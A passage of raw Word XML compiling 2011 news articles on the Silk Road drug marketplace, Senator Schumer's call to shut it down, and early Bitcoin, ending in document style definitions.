user can create an account on Silk Road and start purchasing illegal drugs from individuals around the world and have them delivered to their homes within days," the senators' letter states. "We urge you to take immediate action and shut down the Silk Road network."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 is "absolutely" concerned about Bitcoins and other anonymous digital currencies, agency spokeswoman Dawn Dearden said when asked for a response to the senators' concerns.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 is constantly evaluating and analyzing new technologies and schemes perpetrated by drug trafficking networks. While we won't confirm or deny the existence of specific investigations, DEA is well aware of these emerging threats and we will act accordingly," she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may be hard to close. It could easily move from server to server around the globe and change its Web address and name at will, while remaining accessible through Tor.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Bitcoins must be purchased with real money; of late, they have been selling for roughly $10 each.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there are exchanges with bank accounts, such as the Mt. Gox Bitcoin Exchange, that the Justice Department and other law enforcement agencies may be able to target. It is this weak link that worries the currency's enthusiasts.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discussion thread this week on the primary Bitcoin forum was titled "Will Mt. Gox US Bank accounts eventually get frozen?" Some speculated that if the government bans transactions involving Bitcoin exchanges, a layer of shell companies might allow them to continue.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user described this process as simply "growing pains" and asserted that the government "can't stop a peer-to-peer service."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law enforcers might have difficulty stopping Bitcoins without help from their peers in other countries.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little information about Bitcoin exchanges is publicly available, an item posted on a website called Bitcoin Watch states that Mt. Gox's bank account is in Japan, and anecdotal evidence suggests many other exchanges operate outside of the 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Gox's website does not list a phone number, representatives could not be reached via email.</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(Editing by Randall Mikkelsen)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Yahoo! News on Twitter, become a fan on Facebook</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reuters on Yahoo! News 2011.06.08 20:35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://news.yahoo.com/s/nm/20110608/pl_nm/us_financial_bitcoins</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Silk Road: The 'eBay' for Narcotics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 Schumer calls on DOJ to shut down drug-selling website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Angela Wang Epoch Times Staff Created: Jun 5, 2011 Last Updated: Jun 6, 2011</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DRUGS FOR SALE: Sen. Charles Schumer points at a snapshot of Silk Road. Postings of illegal drugs for sale fill up the page. (Lixin Yang/The Epoch Times)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YORK-Online trading has given birth to a new platform for illegal drug sales. At a press conference Sunday, Sen. Charles Schumer called on federal authorities to shut down the online drug network called the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 to believe that you can go on a website and actually get the kinds of drugs that our police officers spend days, months, and years to get off the streets. But it has been revealed that is what is happening," Schumer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February, Silk Road is an underground online market where sellers can list illegal drugs for sale-everything from marijuana to heroin and LSD. Its users must first download software called Tor, a hidden service protocol that masks I.P. addresses to and from the site so that users can remain anonymous.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Along with an ordinary Web address that ends with .org, the website is also based on Onion, a hidden service descriptor.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Silk Road transactions are done using "bitcoin," a digital peer-to-peer currency. Users purchase bitcoins from individual sellers and negotiate the price privately on Bitcoin's official forum. As exchange of bitcoins happens without going through a bank, transactions on Silk Road are untraceable. "It is the most brazen attempt to peddle drugs online that we have ever seen," said Schumer in reference to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market review section of Bitcoin's forum, a post that appears to have been created by Silk Road three weeks after the market's launch says that "drugs are an obvious direction to go in ... because there isn't a good market for them currently."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 category for weapons as well because many people are restricted from purchasing these, but no one has listed in that category yet," commented a user named "silkroad," in an answer to questions from another Bitcoin user. The post has attracted more than 15 pages of comments.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Entering the Web address at press time indicated that the site is temporarily closed but may reopen in July.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website is nothing more than an all-you-can-order buffet of narcotics that needs to be shut down immediately, and that is what we are asking the authorities to do," Schumer said. The senator has reached out to the Drug Enforcement Administration (DEA), which, according to the senator, has confirmed that it is aware of the site. The senator is also calling on the Department of Justice (DOJ) to help shut the site down immediately.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 Google Wallet Launch Overshadowed by PayPal Lawsuit "The bottom line is that a drug deal is a drug deal, whether online or on the streets. If we allow websites like Silk Road to continue, we will have a massive black market," Schumer said. "We can't let that happen, and that's why it needs to be shut down completely."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Epoch Times 2011.06.06 11:10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.theepochtimes.com/n2/technology/silk-road-the-ebay-for-narcotics-57274.html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Silk Road, website where illegal drugs can be ordered for home delivery, must be shut down: Schumer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Lore Croghan DAILY NEWS STAFF WRITER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high time for the Feds to stop traffic on Silk Road, a Website where a vast array of illegal drugs is sold, Sen. Chuck Schumer said Sunday.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Schumer called on the U.S. Drug Enforcement Administration and the Department of Justice to shut down the Internet drug-shopping site, which offers heroin, cocaine and other powerful illegal drugs for home delivery.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"E-commerce has its bad side - it can be used by criminals," Schumer (D- N.Y.) told reporters in his Midtown office.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which has been operating since February, is accessible through a computer network called TOR that keeps drug buyers' and sellers' identities anonymous, according to a report posted on Gawker last week. Instead of using credit cards or PayPal, drug purchasers make buys with a form of digital currency called Bitcoins that they anonymously obtain beforehand.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protection law gives Attorney General Eric Holder the authority to seize Silk Road's domain name, Schumer said in a letter to Holder and DEA Administrator Michele Leonhart.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a conventional shopping site, Silk Road even allows buyers to rate the participating drug dealers' delivery performance.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whole thing makes you scratch your head and wonder," Schumer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lcroghan@nydailynews.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>NY Daily News 2011.06.05 23:21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://feeds.nydailynews.com/~r/nydnrss/news/us_world/~3/tNRxsBF2BpY/2011-06-05_silk_road_website_where_illegal_drugs_can_be_ordered_for_home_delivery_must_be_s.html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The Underground Website Where You Can Buy Any Drug Imaginable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Adrian Chen, Gawker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Making small talk with your pot dealer sucks. Buying cocaine can get you shot. What if you could buy and sell drugs online like books or light bulbs? Now you can: Welcome to Silk Road.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three weeks ago, the U.S. Postal Service delivered an ordinary envelope to Mark's door. Inside was a tiny plastic bag containing 10 tabs of LSD. "If you had opened it, unless you were looking for it, you wouldn't have even noticed," Mark told us in a phone interview.</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a software developer, had ordered the 100 micrograms of acid through a listing on the online marketplace Silk Road. He found a seller with lots of good feedback who seemed to know what they were talking about, added the acid to his digital shopping cart and hit "check out." He entered his address and paid the seller 50 Bitcoins - untraceable digital currency - worth around $150. Four days later, the drugs (sent from Canada) arrived at his house.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kind of felt like I was in the future," Mark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a digital black market that sits just below most internet users' purview, does resemble something from a cyberpunk novel. Through a combination of anonymity technology and a sophisticated user-feedback system, Silk Road makes buying and selling illegal drugs as easy as buying used electronics - and seemingly as safe. It's Amazon - if Amazon sold mind- altering chemicals.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is just a small selection of the 340 items available for purchase on Silk Road by anyone, right now: a gram of Afghani hash; 1/8 ounce of "sour 13" weed; 14 grams of ecstasy; .1 gram tar heroin. A listing for "Avatar" LSD includes a picture of blotter paper with big blue faces from the James Cameron movie on it.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sellers are located all over the world, a large portion from the United States and Canada.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even Silk Road has limits: You won't find any weapons-grade plutonium, for example. Its terms of service ban the sale of "anything who's purpose is to harm or defraud, such as stolen credit cards, assassinations, and weapons of mass destruction."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Amazon - if Amazon sold mild-altering chemicals.'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Getting to Silk Road is tricky. The URL seems made to be forgotten. But don't point your browser there yet. It's only accessible through the anonymizing network, TOR, which requires a bit of technical skill to configure.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you're there, it's hard to believe that Silk Road isn't simply a scam. Such brazenness is usually displayed only by those fake "online pharmacies" that dupe the dumb and flaccid. There's no sly, Craigslist-style code names here. But while scammers do use the site, most of the listings are legit. Mark's acid worked as advertised. "It was quite enjoyable, to be honest," he said. We spoke to one Connecticut engineer who enjoyed sampling some "silver haze" pot purchased off Silk Road. "It was legit," he said. "It was better than anything I've seen."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Edgarnumbers is selling these 2C-B "blue bees" tablets. Price: 1.15 bitcoins ($10) per tablet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Silk Road cuts down on scams with a reputation-based trading system familiar to anyone who's used Amazon or eBay. The user Bloomingcolor appears to be an especially trusted vendor, specializing in psychedelics. One happy customer wrote on his profile: "Excellent quality. Packing, and communication. Arrived exactly as described." They gave the transaction five points out of five.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community is amazing," Silk Road's anonymous administrator, known on forums as "Silk Road," told us in an e-mail. "They are generally bright, honest and fair people, very understanding, and willing to cooperate with each other."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Sellers feel comfortable openly selling hard-core drugs because the real identities of those involved in Silk Road transactions are utterly obscured. If the authorities wanted to ID Silk Road's users with computer forensics, they'd have nowhere to look. TOR masks a user's tracks on the site. As for transactions, Silk Road doesn't accept credit cards, PayPal or any other form of payment that can be traced or blocked. The only money good here is Bitcoins.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have been called a "crypto-currency," the online equivalent of a brown paper bag of cash. Bitcoins are a peer-to-peer currency, not issued by banks or governments, but created and regulated by a network of other bitcoin holders' computers. (The name "Bitcoin" is derived from the pioneering file-sharing technology Bittorrent.) They are purportedly untraceable and have been championed by cyberpunks, libertarians and anarchists who dream of a distributed digital economy outside the law, one where money flows across borders as free as bits.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purchase something on Silk Road, you need first to buy some Bitcoins using a service like Mt. Gox Bitcoin Exchange. Then, create an account on Silk Road, deposit some bitcoins, and start buying drugs. One bitcoin is worth about $8.67, though the exchange rate fluctuates wildly every day. Right now you can buy an 1/8 ounce of pot on Silk Road for 7.63 Bitcoins. That's probably more than you would pay on the street, but most Silk Road users seem happy to pay a premium for convenience.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kind of felt like I was in the future.'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it launched this February, Silk Road has represented the most complete implementation of the Bitcoin vision. Many of its users come from Bitcoin's Utopian geek community and see Silk Road as more than just a place to buy drugs. Silk Road's administrator cites the anarcho-libertarian philosophy of Agorism. "The state is the primary source of violence, oppression, theft and all forms of coercion," Silk Road wrote to us. "Stop funding the state with your tax dollars and direct your productive energies into the black market."</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the LSD buyer, had similar views. "I'm a libertarian anarchist and I believe that anything that's not violent should not be criminalized," he said.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1UP of Canada is offering 1/8 ounce of "the infamous Jack Herer." He writes: "This is just classic stuff, well grown, well cured, well smoked." Price: 7.42 bitcoins ($64) But not all Bitcoin enthusiasts embrace Silk Road. Some think the association with drugs will tarnish the young technology, or might draw the attention of federal authorities. "The real story with Silk Road is the quantity of people anxious to escape a centralized currency and trade," a longtime bitcoin user named Maiya told us in a chat. "Some of us view Bitcoin as a real currency, not drug barter tokens."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and Bitcoins could herald a black market eCommerce revolution. But anonymity cuts both ways. How long until a DEA agent sets up a fake Silk Road account and starts sending SWAT teams instead of LSD to the addresses she gets? As Silk Road inevitably spills out of the bitcoin bubble, its drug-swapping utopians will meet a harsh reality no anonymizing network can blur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Wired News 2011.06.01 23:34</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.wired.com/threatlevel/2011/06/silkroad/?currentPage=all</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New currency on the block</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Deepa Kurup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attempt to restore privacy and anonymity in online transactions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File photo: AP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customers:Thousands of PayPal users suffered last year when the firm withdrew services from India.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BANGALORE: In the post-WikiLeaks phase of our information age, it has become evident that the Internet is no more the neutral and ‘free' medium that we believed it to be. That within days of the release of the controversial American diplomatic cables, two credit card companies and a popular online money transaction service, PayPal, cut off critical flow of funds to Wikileaks (clearly acting under pressure from the U.S.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>administration) exposed major chinks in the armour.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crisis brought two issues to the fore - that the Internet as we know it today is indeed at the mercy of commercial interests, and that cash transactions on the Internet are all too centralised and deeply susceptible to corporate or State interference. Enter BitCoin.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the world's first distributed or decentralised Internet currency that runs on a peer-to-peer (P2P) network. The P2P architecture eliminates the need for the ‘middleman' - banks or payment services - even as it is runs on a node of networks managed by users, and allows you to transact with other BitCoin accounts or buy Internet products and services. The attempt here is to restore the privacy and anonymity to cash transactions, which were once confined to the pages of your bank passbook, but are now open to tracking and hidden regulation.</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cash</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Seen as a significant development in the world of digital cash, this open source project was created in 2009 by Satoshi Nakamoto and was formally announced by Google in March 2010. As of this week, there are 61 lakh BitCoins in circulation and the total size of the BitCoin economy is around Rs. 2.3 crore, a small yet decent number given the software is still very much in Beta.</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convincing idea, BitCoin is yet to make an impact among Indian users. But considering the thousands of PayPal customers who suffered last year when the firm withdrew services from India, this is one idea that is likely to catch on among freelancers and small businesses.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BitCoin works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decentralisation sounds ideal, but how does a P2P project running on equal nodes on a network run by users - something that works just fine when it comes to stuff such as music and video - work with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how. First, you install the BitCoin client software. Once this is set up, you get a BitCoin address. Now every BitCoin you own (or even earn by lending your computer to the network) has a digital signature attached to it. Now an electronic coin is nothing but a chain of public digital signatures or keys. Each owner transfers the coin to the next by digitally signing a hash of the previous transaction and the public key of the next owner and adding these to the end of the coin, as a research paper on BitCoin explains. A payee can verify the signatures to verify the chain of ownership.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nodes are part of a P2P network, the anonymity of the transaction is maintained. That transaction costs can be kept lower and accounts can't be inexplicably controlled or frozen are other advantages. Encryption technologies are key here, for the complete log of transactions is kept in a block chain of keys on the P2P network that is owned by everyone.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generating new BitCoins for the network is easy (you just have to run your Bitcoin client), adding blocks to the chain requires more time and processing power. BitCoin developers have incentivised this by providing free BitCoins to those who pledge their computer to the network. They hope, this will give rise to a vibrant ‘mining' network in the BitCoin economy. The more ‘mines' there are, the more robust and secure the network will be.</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is BitCoin the answer to all the privacy and control issues with digital cash? It's too early to say whether BitCoin will take off or not. As Rainy Reitman of the Electronic Frontier Foundation points out in her blog, governments may raise legal issues ranging from money laundering to tax evasion to a range of other regulatory concerns. Further, the worth of BitCoins will be linked to the ever-fluctuating market, posing constant challenges.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with its equal architecture and mission to decentralise financial transactions on the Web, BitCoin is indeed a convincing idea and a significant step towards liberating online transactions as we know it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The Hindu 2011.05.08 23:23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.hindu.com/2011/05/09/stories/2011050954840900.htm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Crypto Currency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Andy Greenberg,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has left plenty of dead and maimed paper-based institutions in its wake. If Gavin Andresen and his underground cadre of cypherpunks have their way, another archaic slice of pulped tree may be next: the dollar.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grassroots nonprofit project that seeks to fashion a new currency out of little more than cryptography, networking and open-source software, and Andresen is the closest thing the project has to a director. Bitcoin is not, he explains, just a new way to digitally spend dollars, pounds and yen. That's been tried before. Remember Beenz and Flooz?</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different: It wholly replaces state-backed currencies with a digital version that's tougher to forge, cuts across international boundaries, can be stored on your hard drive instead of in a bank, and-- perhaps most importantly to many of Bitcoin's users--isn't subject to the inflationary whim of whatever Federal Reserve chief decides to print more money.</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designed to bring us back to a decentralized currency of the people," says Andresen, a 44-year-old software developer and entrepreneur based in Amherst, Mass. "This is like better gold than gold."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with shiny-metal-backed currencies, Bitcoins derive their value partly through their scarcity, which is defined not by how much can be dug up with shovels but by a cryptographic lottery. Anyone can get Bitcoins without paying cash for them by downloading and running Bitcoin's "mining" program. The machines in Bitcoin's mining network, now in the thousands, compute an encryption function called a "hash" on a set of random numbers, and coins are awarded every ten minutes to whichever miner happens to compute a number below a certain threshold.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lottery tightly controls how many Bitcoins are created. There are currently close to 6 million in existence. By 2014 there will be about twice that number. Bitcoin's distributed software is set to slow production over time so that there will never be more than 21 million in circulation. "No banker can control it. No evil dictator tyrant can print zillions and destroy the value," says Bruce Wagner, organizer of New York's Bitcoin developer's meet-up.</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the other factor that determines the worth of a currency is whether anyone will accept it in exchange for goods and services. And for Bitcoin, a subculture of geek-friendly merchants is catching on. About $30,000 worth of Bitcoins change hands every day in electronic transactions, spent on Web-hosting, electronics, dog sweaters and alpaca socks.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drugs. Particularly illegal ones. Since Bitcoins can be spent on the Internet without the use of a bank account, they offer a convenient system for anonymous purchases. There's no centralized storage of funds, so accounts can't be frozen by law enforcement or PayPal administrators. "Illegal stuff will be a niche for Bitcoin," admits Andresen. "That bothers me, but it's just like any currency. You can't stop dollar bills from being used for the drug trade either. That's an unfortunate feature of any cashlike system."</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anonymity was no accident. The system was originally designed by Satoshi Nakamoto, a mysterious, privacy-obsessed figure who first described the currency's specs in a series of posts on a cryptography e-mail list in late 2008. Nakamoto declined to be interviewed for this story, and not even Andresen, who took over the project as technical lead in May 2010, has communicated with Bitcoin's founder except through e-mail and posts on Web forums. Nakamoto has compared Bitcoin to the systems of anonymous financial transactions sought by the anarchist cypherpunk movement in the 1990s, whose adherents saw cryptography as a way to shift power from institutions to individuals.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in part to its growing uses, both black- and white-market, the newborn currency is appreciating at a wild clip. In just the year since Andresen joined the project, it's jumped from half a penny in value to about a dollar.</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possibly irrational exuberance may be a sign that Bitcoin is headed for a speculative bubble. The currency already swings as much as 50% in value over some single days. But Bitcoin's supporters are confident the free market can solve that problem as Bitcoin's advantages attract more nonspeculative buying and selling.</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way they hope to bring more normals into the fold: by expanding Bitcoin's applications to the real world. Bitcoin devotees in New York's informal developer group are rolling out an Android app for mobile Bitcoin buying. And a startup called ShopKeep.com, which builds Macs and iPads into point-of-sale terminals, is integrating Bitcoin compatibility into all of its registers.</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"Someday this will probably have the Fed scrambling," says the New York meet-up's Bruce Wagner. "They still don't know what Twitter is. By the time they figure this out, it will have already taken hold."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">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Offer: Free Trial Issue of Forbes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F854A0" w:rsidRDefault="00F854A0" w:rsidP="00F854A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Forbes 2011.04.21 02:12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.forbes.com/forbes/2011/0509/technology-psilocybin-bitcoins-gavin-andresen-crypto-currency_print.html</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00E21ACE" w:rsidRPr="00F854A0" w:rsidRDefault="00E21ACE" w:rsidP="00F854A0"/>
    <w:sectPr w:rsidR="00E21ACE" w:rsidRPr="00F854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6133"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="38DE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772AA3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F5A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5D4938"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4B7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4251D44"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CDB0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FEA0EE6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="924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64A"/>
    <w:rsid w:val="00213F48"/>
    <w:rsid w:val="0040364A"/>
    <w:rsid w:val="00455F82"/>
    <w:rsid w:val="0052200D"/>
    <w:rsid w:val="00870958"/>
    <w:rsid w:val="009139EF"/>
    <w:rsid w:val="00B94710"/>
    <w:rsid w:val="00E21ACE"/>
    <w:rsid w:val="00F854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854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70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5220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2200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22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2200D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a5">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0052200D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a6">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0052200D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00870958"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="contents">
    <w:name w:val="contents"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph-kknbio">
    <w:name w:val="paragraph-kknbio"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="008709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870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-html">
    <w:name w:val="katex-html"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="base">
    <w:name w:val="base"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="strut">
    <w:name w:val="strut"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mspace">
    <w:name w:val="mspace"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mrel">
    <w:name w:val="mrel"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mpunct">
    <w:name w:val="mpunct"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="minner">
    <w:name w:val="minner"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="block">
    <w:name w:val="block"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-display">
    <w:name w:val="katex-display"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="msupsub">
    <w:name w:val="msupsub"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-t">
    <w:name w:val="vlist-t"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-r">
    <w:name w:val="vlist-r"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist">
    <w:name w:val="vlist"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pstrut">
    <w:name w:val="pstrut"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sizing">
    <w:name w:val="sizing"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="vlist-s">
    <w:name w:val="vlist-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mopen">
    <w:name w:val="mopen"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mclose">
    <w:name w:val="mclose"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mbin">
    <w:name w:val="mbin"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="delimsizing">
    <w:name w:val="delimsizing"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00870958"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mfrac">
